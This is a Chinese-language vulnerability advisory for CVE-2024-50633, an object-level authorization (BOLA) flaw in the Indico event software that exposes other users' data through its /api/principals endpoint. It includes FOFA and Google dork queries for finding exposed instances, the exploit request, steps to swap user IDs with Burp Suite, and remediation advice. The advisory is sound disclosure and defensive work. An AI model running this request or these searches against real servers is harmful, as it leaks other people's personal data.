(发现并报告了 Indico 中的 BOLA 漏洞。)
Indico v3.2.9 中存在一个 对象级授权失效(BOLA) 漏洞,攻击者可通过操纵 API 请求访问敏感用户信息。
FOFA : title="Indico" || header="Indico"
Google Dork : intitle:"Indico" inurl:"/event"
/api/principalsPOST /api/principals HTTP/2
Content-Type: application/json
{
"values": ["User:2301"]
}
通过修改 User 值(例如 User:2302),攻击者可以访问另一用户的数据。 复现步骤: 在 Indico 网站上注册。 导航到“创建活动”(Create Event)部分,并使用 Burp Suite 捕获 POST 请求。 将 values 参数修改为另一个用户 ID。 观察到返回了未授权的数据。
🔥 影响 此漏洞可能暴露其他用户的敏感信息。 它破坏了授权边界,可能导致数据泄露。
⚙️ 受影响版本 Indico v3.2.9 至 v3.3.2
🔧 如何修复 [CVE-2024-50633]?
更新到最新版本: 确保您的 Indico 实例已更新到修复该漏洞的最新补丁版本。请查看 Indico 的官方发布以获取更新。
限制对敏感端点的访问: 在诸如 /api/principals 之类的 API 端点上应用严格的访问控制,以确保只有授权用户才能访问敏感信息。使用基于角色的访问控制(RBAC)机制。
实施输入验证: 对所有 API 请求中用户提供的输入进行验证和清理,以防止未经授权的访问或数据篡改。
监控和审计日志: 定期监控服务器日志,查找对 /api/principals 的异常 API 请求或未授权访问尝试。这有助于识别利用尝试。
使用 Web 应用防火墙(WAF): 部署 WAF 可以通过检测和阻止恶意请求,为抵御利用尝试提供额外的一层保护。
🕵️♂️ 报告者 Çetin BİNİCİ